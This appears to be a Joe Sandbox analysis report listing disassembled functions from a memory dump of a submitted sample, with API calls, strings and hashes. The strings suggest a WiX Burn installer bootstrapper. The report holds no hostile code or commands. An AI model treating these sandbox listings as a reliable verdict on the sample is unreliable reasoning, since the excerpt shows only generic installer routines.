Part of subcall function 00D52DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D52F09

LeaveCriticalSection.KERNEL32(00DBB5FC,?,?,00DBB5F4,?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?), ref: 00D9067A

Strings

logutil.cpp, xrefs: 00D90606

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 0e5be3a57541f2c92685e1e623878864a8bacea9367a65a085a22727ad8e1fa2
Instruction ID: fa39b042b848464e4ab973cc806cfe844d162d09aa1426b016b29e7d710e6f87
Opcode Fuzzy Hash: 0e5be3a57541f2c92685e1e623878864a8bacea9367a65a085a22727ad8e1fa2
Instruction Fuzzy Hash: E1318531D00319EFDF215F65AD45EAA7EA8EB00765F050226FD01E7260D7B1DD609BB1

Function 00D932F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D93309
SysAllocString.OLEAUT32(?), ref: 00D93325
VariantClear.OLEAUT32(?), ref: 00D933AC
SysFreeString.OLEAUT32(00000000), ref: 00D933B7

Strings

`5w, xrefs: 00D933B7
xmlutil.cpp, xrefs: 00D9333C

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `5w$xmlutil.cpp
API String ID: 760788290-26783885
Opcode ID: 95c5a4f32d7e831f18f44d172fc4979a8b4feb016c9805733e6ba23a39d26315
Instruction ID: 53166363197806e632656c3975749c1cafc5d04e756b465b8af04fc0e05c69fd
Opcode Fuzzy Hash: 95c5a4f32d7e831f18f44d172fc4979a8b4feb016c9805733e6ba23a39d26315
Instruction Fuzzy Hash: 68216D36941219EFCF21DFA4C948EAEBBB9AF45725F150159F905EB220DB319E048BB0

Function 00D70B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00D70BDE
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00D70BFD
GetLastError.KERNEL32 ref: 00D70C07

Strings

Failed to write during cabinet extraction., xrefs: 00D70C35
cabextract.cpp, xrefs: 00D70C2B
Unexpected call to CabWrite()., xrefs: 00D70BC1

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: d7ee9552fe0b90b882448c1f900e61249775f4447bfbe3c3240aecece653272b
Instruction ID: c8a552128da7a109b843457052657b1069dfd3a81b516522ed26c7e50a2dd47e
Opcode Fuzzy Hash: d7ee9552fe0b90b882448c1f900e61249775f4447bfbe3c3240aecece653272b
Instruction Fuzzy Hash: 7721CF76500205EBCB15CF5CD985D5A7BA8EF85720B25825AFE08C7281F731E900CB71

Function 00D90879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,00D553BD,00000000,?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D90897
GetLastError.KERNEL32(?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D908A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D908D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D908EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D6769D,00000000), ref: 00D9092B

Strings

procutil.cpp, xrefs: 00D90919

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 79ff989604b9369bf089b6e65bc2381149c51bc515858cb65f20e8b2e88d1e9a
Instruction ID: 27b073cd3cac04a701bc893c87b3a63294f959b26aed6e62b69abb63a721c87e
Opcode Fuzzy Hash: 79ff989604b9369bf089b6e65bc2381149c51bc515858cb65f20e8b2e88d1e9a
Instruction Fuzzy Hash: 2821A732E40229FFDF21AB99A905A9EBFB8EF14760F154157AD55E7250D3708E00DAF0

Function 00D70C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00D70CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D70CD6
SetFileTime.KERNELBASE(?,?,?,?), ref: 00D70CE9
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00D708B1,?,?), ref: 00D70CF8

Strings

Invalid operation for this state., xrefs: 00D70C9D
cabextract.cpp, xrefs: 00D70C93

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 1957cc561dbedf32f5c66fadeeca1e91db8fba614c6242a543228da3409c186f
Instruction ID: da2e449f781a4593c7526f032f3260f165c68849c562fcf751cd3077ecc54562
Opcode Fuzzy Hash: 1957cc561dbedf32f5c66fadeeca1e91db8fba614c6242a543228da3409c186f
Instruction Fuzzy Hash: 3A219671800619EB8B209FA8DD499BA7FACFF047207548217F858D65D0E774E951CBB4

Function 00D93565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D93574
InterlockedIncrement.KERNEL32(00DBB6C8), ref: 00D93591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00DBB6B8,?,?,?,?,?,?), ref: 00D935AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,00DBB6B8,?,?,?,?,?,?), ref: 00D935B8

Strings

MSXML.DOMDocument, xrefs: 00D935B3
Msxml2.DOMDocument, xrefs: 00D935A7

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 92e098c1d6a10c52db9d2d7855ec2290c661c625fa760f51ef3d038a4936c987
Instruction ID: 7efdab4e1466cff9cde01ca4c652a89cf998b5cd5719c2cdd14384e1bcdd8e7c
Opcode Fuzzy Hash: 92e098c1d6a10c52db9d2d7855ec2290c661c625fa760f51ef3d038a4936c987
Instruction Fuzzy Hash: F5F0E530740325DBCBA06B627E09B572EA5DB89B74F06052FEC01C6250D7A0CD458AB0

Function 00D94A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D94A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00D94ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00D94AF6
GetLastError.KERNEL32(00000000,00D9B7A0,?,00000000,?,00000000,?,00000000), ref: 00D94B34
GlobalFree.KERNEL32(00000000), ref: 00D94B65

Strings

fileutil.cpp, xrefs: 00D94AB8, 00D94B11

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: d242dd594777275bcc13c40fc14cba229d34a5d54655dfc5dd9ad745ea3c2bc4
Instruction ID: 7fca24a3a372cfe54c30be66779d2ac3c51958606a2c1ddb9220808e856ba0ec
Opcode Fuzzy Hash: d242dd594777275bcc13c40fc14cba229d34a5d54655dfc5dd9ad745ea3c2bc4
Instruction Fuzzy Hash: 8731C236E40229ABCF219A998C41FAFFAA8EF44764F154256FD54E7242E730DC0186F4

Function 00D6E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 00D6E985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00D6E994
SetWindowLongW.USER32(?,000000EB,?), ref: 00D6E9A8
DefWindowProcW.USER32(?,?,?,?), ref: 00D6E9B8
GetWindowLongW.USER32(?,000000EB), ref: 00D6E9D2
PostQuitMessage.USER32(00000000), ref: 00D6EA31

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: f4d24d5dec46134111aa553bbe4fc7a4b586373f19a908fc9fd9acab8dc75225
Instruction ID: 1b08d9290d69637aea2728a81e9c3d4106d8dd99da980577343ff7dc1b9ff0b1
Opcode Fuzzy Hash: f4d24d5dec46134111aa553bbe4fc7a4b586373f19a908fc9fd9acab8dc75225
Instruction Fuzzy Hash: CA21C135104214BFDF119FA8ED09E6A3B65FF45321F194619F906DA2A4C731DD10DB70

Function 00D70A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D70B27
GetLastError.KERNEL32(?,?,?), ref: 00D70B31

Strings

Failed to move file pointer 0x%x bytes., xrefs: 00D70B62
Invalid seek type., xrefs: 00D70ABD
cabextract.cpp, xrefs: 00D70B55

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 33240433b51b86d7e164bc8a960640a15ec6f31a86639dab53a643160bdf1e5f
Instruction ID: 04ba59cf340c5cfc4c819cf66e6035c334c0464bce1c781e8a8ddcd86311dd5f
Opcode Fuzzy Hash: 33240433b51b86d7e164bc8a960640a15ec6f31a86639dab53a643160bdf1e5f
Instruction Fuzzy Hash: DA318131A4021AEFCB15DFA8D885D6EBB69FB04724B15C216FD1897291E730EE10CBB0

Function 00D54115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00D6A0E8,00000000,00000000,?,00000000,00D553BD,00000000,?,?,00D5D5B5,?), ref: 00D54123
GetLastError.KERNEL32(?,00D6A0E8,00000000,00000000,?,00000000,00D553BD,00000000,?,?,00D5D5B5,?,00000000,00000000), ref: 00D54131
CreateDirectoryW.KERNEL32(?,840F01E8,00D55489,?,00D6A0E8,00000000,00000000,?,00000000,00D553BD,00000000,?,?,00D5D5B5,?,00000000), ref: 00D5419A
GetLastError.KERNEL32(?,00D6A0E8,00000000,00000000,?,00000000,00D553BD,00000000,?,?,00D5D5B5,?,00000000,00000000), ref: 00D541A4

Strings

dirutil.cpp, xrefs: 00D541D4

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 5c9cec277212223886650f4b091d7cb7f819137534fb95246924e0deaf534e7a
Instruction ID: 272e154660f22b9737231df9f7b943dcd957565d2978e00d49b61d91e8ea0bcc
Opcode Fuzzy Hash: 5c9cec277212223886650f4b091d7cb7f819137534fb95246924e0deaf534e7a
Instruction Fuzzy Hash: 9D11D526A00B3596DF311AA55D40F3BAA64EF75BBBF154026FD49EB240E3608CD492B3

Function 00D63AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D90F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00DBAAA0,00000000,?,00D957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D90F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D63FB5,feclient.dll,?,00000000,?,?,?,00D54B12), ref: 00D63B42

Part of subcall function 00D910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D9112B
Part of subcall function 00D910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D91163

Strings

feclient.dll, xrefs: 00D63AAB
Logging, xrefs: 00D63AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00D63AB7

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 5f4cfaa83e601e4a6ea43a748d22a29a8b16b868496fdcdc7e7a0bf637493ba0
Instruction ID: 9abf351656f5618c1c187b1e04174c14a9cf7d384b8a2c65b8103d236cdad38d
Opcode Fuzzy Hash: 5f4cfaa83e601e4a6ea43a748d22a29a8b16b868496fdcdc7e7a0bf637493ba0
Instruction Fuzzy Hash: 7211B236B40208BBDB21DF99DD82EBEBBB8EB01B10F540076E501AB191D6719F81D770

Function 00D90764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(00D6E93B,00000000,00000000,?,?,?,00D90013,00D6E93B,00D6E93B,?,00000000,0000FDE9,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D90776
WriteFile.KERNELBASE(00000208,00000000,00000000,?,00000000,?,?,00D90013,00D6E93B,00D6E93B,?,00000000,0000FDE9,?,00D6E93B,8000FFFF), ref: 00D907B2
GetLastError.KERNEL32(?,?,00D90013,00D6E93B,00D6E93B,?,00000000,0000FDE9,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D907BC

Strings

logutil.cpp, xrefs: 00D907ED

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 388d25110df63fb9c1702029f7fef72940ab1fe436b39de7195dda69d9bfd1f1
Instruction ID: 82841074641d2b098368b23970eb8e9e7f6e5d55db35a97780130541b6d8da6a
Opcode Fuzzy Hash: 388d25110df63fb9c1702029f7fef72940ab1fe436b39de7195dda69d9bfd1f1
Instruction Fuzzy Hash: 6A118A72A41225FFCB109AA9AD449AFBE6CEB45771B110325FE05E7240DB70ED40C9F0

Function 00D709EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D70A19,?,?,?), ref: 00D71434
Part of subcall function 00D7140C: GetLastError.KERNEL32(?,00D70A19,?,?,?), ref: 00D7143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00D70A27
GetLastError.KERNEL32 ref: 00D70A31

Strings

Failed to read during cabinet extraction., xrefs: 00D70A5F
cabextract.cpp, xrefs: 00D70A55

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 7ef8ace2ba2b08bb5a826b18e10b1d62c4907b7aeeabc6949716c9758001e9be
Instruction ID: 1f2e80f22d99b2782605d2d1c1f03bb4e0403560f5c4a9e367a1cb7a7629d474
Opcode Fuzzy Hash: 7ef8ace2ba2b08bb5a826b18e10b1d62c4907b7aeeabc6949716c9758001e9be
Instruction Fuzzy Hash: D3118E36A00229FBCB219F99DD04E9E7F68FB05760F128255FD08A7290E7309910CAF0

Function 00D7140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D70A19,?,?,?), ref: 00D71434
GetLastError.KERNEL32(?,00D70A19,?,?,?), ref: 00D7143E

Strings

Failed to move to virtual file pointer., xrefs: 00D7146C
cabextract.cpp, xrefs: 00D71462

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: e872d141a73c9d95b09603ec4ea2848a57eca36cf8d5d6e93869b9e4f9b0fc91
Instruction ID: 138a4fb0389c8d3e67694adc0eb7ae1bbd3a4cab051d18a2620eb35ecbaf98d6
Opcode Fuzzy Hash: e872d141a73c9d95b09603ec4ea2848a57eca36cf8d5d6e93869b9e4f9b0fc91
Instruction Fuzzy Hash: FC01843B5406357B8B215A9A9C05A9BBF24EF01B71715C226FD1C9A211E7219810C6F4

Function 00D707B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00D9B478,00000000,?,00D71717,?,00000000,?,00D5C287,?,00D55405,?,00D675A5,?,?,00D55405,?), ref: 00D707BF
GetLastError.KERNEL32(?,00D71717,?,00000000,?,00D5C287,?,00D55405,?,00D675A5,?,?,00D55405,?,00D55445,00000001), ref: 00D707C9

Strings

Failed to set begin operation event., xrefs: 00D707F7
cabextract.cpp, xrefs: 00D707ED

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 68f97c527a43020d6605a514101f725c232167f6567746add63e86f9af77dd70
Instruction ID: 7b1ab9d89355e0cb7983b2fc9966df313059c0a23d3719130b1c0e49d3f45fc0
Opcode Fuzzy Hash: 68f97c527a43020d6605a514101f725c232167f6567746add63e86f9af77dd70
Instruction Fuzzy Hash: F4F0A737642635A7862462995D05A8F7F98DE05BB1712812AFE09FB280F710AC00C6F6

Function 00D55123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00D51104,?,?,00000000), ref: 00D55142
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00D51104,?,?,00000000), ref: 00D55172

Strings

burn.clean.room, xrefs: 00D5512F, 00D5513C, 00D55169

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 726c5c3b8410ce6606b2bb47f49992443e5757dc2bfd38e1a1dcabb7181ef477
Instruction ID: 44b7951a9cf9f258af759114bc613759e6349c7e5929aefe95c031a2791b387c
Opcode Fuzzy Hash: 726c5c3b8410ce6606b2bb47f49992443e5757dc2bfd38e1a1dcabb7181ef477
Instruction Fuzzy Hash: B6014F72500B25EE8B214B48BD94E73BBACEB15B61B144216FD09D2714D7709C45CBB1

Function 00D53838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D53877
GetLastError.KERNEL32 ref: 00D53881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00D538EA

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

